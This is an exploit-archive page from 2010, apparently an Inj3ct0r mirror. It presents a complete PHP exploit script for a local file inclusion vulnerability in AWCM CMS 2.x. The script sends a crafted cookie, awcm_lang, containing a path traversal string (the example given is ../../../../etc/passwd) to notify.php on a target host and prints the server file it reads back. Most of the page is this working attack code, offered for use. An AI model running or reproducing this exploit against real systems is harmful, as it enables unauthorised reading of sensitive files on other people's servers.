Home / os / win7

AWCM CMS Local File Inclusion Vulnerability

Posted on 10 June 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>AWCM CMS Local File Inclusion Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>===========================================
AWCM CMS Local File Inclusion Vulnerability
===========================================

# Software Link: http://www.awcm-cms.com/
# Version: 2.x
# Tested on: Lunix
 
Exploit :
 
&lt;?php
 
print(&quot;
------------------------------------------------------------
| Awcm Cms Local File Inclusion Vulnerability
| By SwEET-DeViL
| x0.root(at)gmail.com
| example
|
| Exploit.php &quot;.$argv[0].&quot; example.com /path/ ../../../../../../../../etc/passwd
------------------------------------------------------------
&quot;);
$host =$argv[1];//;
$Path = &quot;http://&quot;.$host.$argv[2];
       $CURL_in =&quot;GET &quot;.$Path.&quot;/notify.php?v=a HTTP/1.0
&quot;;
       $CURL_in.=&quot;User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;
Windows NT 5.1)
&quot;;
       $CURL_in.=&quot;Pragma: no-cache
&quot;;
       $CURL_in.=&quot;Cookie: awcm_lang=&quot;.$argv[3].&quot;&quot;.&quot;;
&quot;;
       $CURL_in.=&quot;Connection: Close

&quot;;
 
       if ( empty($argv[3]) ){
               echo &quot;
[-] Error : Exploit failed
&quot;;
               die;
       }
 
       $FoN = @fsockopen($host, 80);
       if(!$FoN){
               echo &quot;
[-] Error : Can't connect to &quot;.$host.&quot; !!
&quot;;
               die;
       }
 
       fputs($FoN, $CURL_in);
       while (!feof($FoN)) $data .= fread($FoN, 1024);
       fclose($FoN);
 
       $error_1 = strstr( $data, &quot;HTTP/1.1 404 Not Found&quot; );
       if ( !empty($error_1) ){
               echo &quot;
[-] Error : 404 Not Found. 
&quot;;
               die;
       }
 
       $error_2 = strstr( $data, &quot;HTTP/1.1 406 Not Acceptable&quot; );
       if ( !empty($error_2) ){
               echo &quot;
[-] Error : 406 Not Acceptable. 
&quot;;
               die;
       }
 
 
 
$EXc = explode(&quot;&lt;/head&gt;&quot;,$data);
$EXx = explode(&quot;&lt;head&gt;&quot;,$EXc[1]);
$CODE = strip_tags($EXx[0]);
$CODE2 = preg_replace(&quot;/
|	/&quot;,'',$CODE);
$CODE2 = trim($CODE2);
 
if (empty($CODE2)){
print ('
 
[-] Error : Sorry! File not Found
 
');
}else{
print ('
[+]
------------------------------------------------------------
').$CODE2;
 
 
 
print ('
 
------------------------------------------------------------
');
 
}
 
?&gt;


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-10]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :